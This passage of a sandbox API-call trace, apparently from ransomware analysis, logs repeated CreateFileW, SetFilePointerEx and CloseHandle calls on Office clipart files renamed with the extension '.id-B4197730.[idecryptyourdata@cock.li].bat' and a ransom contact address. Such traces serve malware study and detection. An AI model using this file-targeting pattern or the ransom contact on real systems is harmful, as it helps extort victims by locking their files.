Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.127] CloseHandle (hObject=0x52c) returned 1 [0165.129] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.129] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.130] CloseHandle (hObject=0x52c) returned 1 [0165.132] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.132] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.132] CloseHandle (hObject=0x52c) returned 1 [0165.133] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.133] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.133] CloseHandle (hObject=0x52c) returned 1 [0165.134] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.135] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.135] CloseHandle (hObject=0x52c) returned 1 [0165.136] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.136] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.137] CloseHandle (hObject=0x52c) returned 1 [0165.137] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.137] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.138] CloseHandle (hObject=0x52c) returned 1 [0165.139] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.139] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.140] CloseHandle (hObject=0x52c) returned 1 [0165.140] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.141] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.141] CloseHandle (hObject=0x52c) returned 1 [0165.142] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.142] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.142] CloseHandle (hObject=0x52c) returned 1 [0165.143] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.143] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.144] CloseHandle (hObject=0x52c) returned 1 [0165.144] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.145] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.145] CloseHandle (hObject=0x52c) returned 1 [0165.147] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.147] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.147] CloseHandle (hObject=0x52c) returned 1 [0165.148] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.149] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.149] CloseHandle (hObject=0x52c) returned 1 [0165.150] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.150] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.150] CloseHandle (hObject=0x52c) returned 1 [0165.152] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.152] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.152] CloseHandle (hObject=0x52c) returned 1 [0165.335] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.335] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.335] CloseHandle (hObject=0x51c) returned 1 [0165.337] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.337] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.337] CloseHandle (hObject=0x51c) returned 1 [0165.338] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.338] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.339] CloseHandle (hObject=0x51c) returned 1 [0165.339] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.340] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.340] CloseHandle (hObject=0x51c) returned 1 [0165.342] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.342] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.342] CloseHandle (hObject=0x51c) returned 1 [0165.343] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.343] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.343] CloseHandle (hObject=0x51c) returned 1 [0165.344] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.344] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.344] CloseHandle (hObject=0x51c) returned 1 [0165.346] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.346] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.346] CloseHandle (hObject=0x51c) returned 1 [0165.347] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.347] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.347] CloseHandle (hObject=0x51c) returned 1 [0165.348] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.348] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.349] CloseHandle (hObject=0x51c) returned 1 [0165.350] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.350] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.350] CloseHandle (hObject=0x51c) returned 1 [0165.352] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.352] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.352] CloseHandle (hObject=0x51c) returned 1 [0165.353] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.353] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.353] CloseHandle (hObject=0x51c) returned 1 [0165.355] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.355] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.355] CloseHandle (hObject=0x51c) returned 1 [0165.356] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.357] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.357] CloseHandle (hObject=0x51c) returned 1 [0165.358] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.358] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.358] CloseHandle (hObject=0x51c) returned 1 [0165.359] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.359] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 